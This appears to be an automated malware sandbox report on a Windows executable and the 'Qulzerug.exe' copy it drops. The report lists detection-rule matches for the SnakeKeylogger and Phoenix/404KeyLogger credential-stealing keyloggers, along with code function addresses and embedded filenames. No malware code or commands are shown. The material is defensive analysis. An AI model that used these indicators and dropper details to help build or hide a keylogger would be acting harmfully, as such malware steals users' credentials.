                  Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPEMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 0000000D.00000002.2495878153.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000C.00000002.2495830056.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTRMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTRMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTRMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTRMatched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                  Source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 0_2_084DDA700_2_084DDA70
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 0_2_084C00400_2_084C0040
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 0_2_084C00060_2_084C0006
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_0158B3418_2_0158B341
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_015886708_2_01588670
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_01584B588_2_01584B58
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_01587A588_2_01587A58
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_0158DD608_2_0158DD60
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_01587DA08_2_01587DA0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE76F88_2_06AE76F8
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AEB6F08_2_06AEB6F0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AEAE388_2_06AEAE38
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE6E308_2_06AE6E30
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE26488_2_06AE2648
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE7FC08_2_06AE7FC0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE5CA08_2_06AE5CA0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE0DB08_2_06AE0DB0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE65688_2_06AE6568
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AEA2B88_2_06AEA2B8
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AED2588_2_06AED258
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE42508_2_06AE4250
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE1B908_2_06AE1B90
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE53D88_2_06AE53D8
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE4B108_2_06AE4B10
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE88808_2_06AE8880
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE39888_2_06AE3988
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE99F08_2_06AE99F0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE91488_2_06AE9148
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE76E88_2_06AE76E8
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AEB6E18_2_06AEB6E1
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AEAE238_2_06AEAE23
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE6E208_2_06AE6E20
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE26378_2_06AE2637
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE7FB08_2_06AE7FB0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE2F028_2_06AE2F02
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE2F108_2_06AE2F10
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE1CA88_2_06AE1CA8
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE1C998_2_06AE1C99
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE5C908_2_06AE5C90
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE0DA18_2_06AE0DA1
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE65588_2_06AE6558
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AEA2AA8_2_06AEA2AA
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE4AFF8_2_06AE4AFF
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AED24A8_2_06AED24A
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE42408_2_06AE4240
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE53CA8_2_06AE53CA
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE886F8_2_06AE886F
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE99E08_2_06AE99E0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE91388_2_06AE9138
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06AE397A8_2_06AE397A
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B7AA308_2_06B7AA30
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B7DCB08_2_06B7DCB0
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B700408_2_06B70040
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B786EE8_2_06B786EE
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_06B700068_2_06B70006
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 9_2_0863DA709_2_0863DA70
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 9_2_086200409_2_08620040
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 9_2_086200069_2_08620006
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 11_2_0809DA7011_2_0809DA70
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 11_2_0808000A11_2_0808000A
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 11_2_0808004011_2_08080040
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_0161B34112_2_0161B341
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_0161867012_2_01618670
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_01617A5812_2_01617A58
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_0161DD6012_2_0161DD60
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_01617DA012_2_01617DA0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_0161DD5712_2_0161DD57
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5B6F012_2_06D5B6F0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D576F812_2_06D576F8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5264812_2_06D52648
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D56E3012_2_06D56E30
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5AE3812_2_06D5AE38
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D57FC012_2_06D57FC0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D55CA012_2_06D55CA0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D50DB012_2_06D50DB0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5656812_2_06D56568
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5A2B812_2_06D5A2B8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5425012_2_06D54250
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5D25812_2_06D5D258
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D553D812_2_06D553D8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D51B9012_2_06D51B90
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D54B1012_2_06D54B10
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5888012_2_06D58880
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D599F012_2_06D599F0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5398812_2_06D53988
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5914812_2_06D59148
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D576EF12_2_06D576EF
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5B6EB12_2_06D5B6EB
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5264312_2_06D52643
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D56E2512_2_06D56E25
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5AE2F12_2_06D5AE2F
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D57FB312_2_06D57FB3
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D52F1012_2_06D52F10
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D52F0312_2_06D52F03
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D55C9312_2_06D55C93
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D51CA312_2_06D51CA3
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D51CA812_2_06D51CA8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D50DAB12_2_06D50DAB
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5655812_2_06D56558
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D54AFF12_2_06D54AFF
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5A2B312_2_06D5A2B3
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5424B12_2_06D5424B
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5D24B12_2_06D5D24B
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D553D312_2_06D553D3
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5887B12_2_06D5887B
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D599EB12_2_06D599EB
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5398312_2_06D53983
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06D5914312_2_06D59143
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEDCB012_2_06DEDCB0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEAA3012_2_06DEAA30
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DE004012_2_06DE0040
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DEB1A312_2_06DEB1A3
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 12_2_06DE000712_2_06DE0007
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_0102B34113_2_0102B341
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_0102867013_2_01028670
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_01027A5813_2_01027A58
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_0102DD6013_2_0102DD60
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_01027DA013_2_01027DA0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D76F813_2_068D76F8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068DB6F013_2_068DB6F0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068DAE3813_2_068DAE38
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D6E3013_2_068D6E30
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D264813_2_068D2648
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D7FC013_2_068D7FC0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D5CA013_2_068D5CA0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D0DB013_2_068D0DB0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D656813_2_068D6568
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068DA2B813_2_068DA2B8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068DD25813_2_068DD258
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D425013_2_068D4250
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D1B9013_2_068D1B90
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D53D813_2_068D53D8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D4B1013_2_068D4B10
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D888013_2_068D8880
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D398813_2_068D3988
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D99F013_2_068D99F0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D914813_2_068D9148
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D76E813_2_068D76E8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068DB6E113_2_068DB6E1
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D6E2013_2_068D6E20
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068DAE2313_2_068DAE23
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D263713_2_068D2637
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D7FB013_2_068D7FB0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D2F0313_2_068D2F03
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D2F1013_2_068D2F10
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D1C9913_2_068D1C99
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D5C9013_2_068D5C90
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D1CA813_2_068D1CA8
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D0DA113_2_068D0DA1
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D655813_2_068D6558
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068DA2AB13_2_068DA2AB
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D4AFF13_2_068D4AFF
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068DD24A13_2_068DD24A
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D424013_2_068D4240
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D53CB13_2_068D53CB
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D886F13_2_068D886F
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D99E013_2_068D99E0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D913813_2_068D9138
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_068D397713_2_068D3977
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_0696AA3013_2_0696AA30
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_0696DCB013_2_0696DCB0
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_0696004013_2_06960040
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeCode function: 13_2_0696000613_2_06960006
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.00000000028A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1317117099.0000000007BB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006B3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamek.exe$ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLxkfkqeij.dll" vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1316623407.0000000007B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000000.1242378149.0000000000592000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWzkyuqq.exe0 vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWzkyuqq.exe0 vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamek.exe$ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLxkfkqeij.dll" vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1287144477.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exe, 00000008.00000002.2496879435.0000000000DA7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exeBinary or memory string: OriginalFilenameWzkyuqq.exe0 vs 6Ek4nfs2y1.exe
                  Source: 6Ek4nfs2y1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 12.2.Qulzerug.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
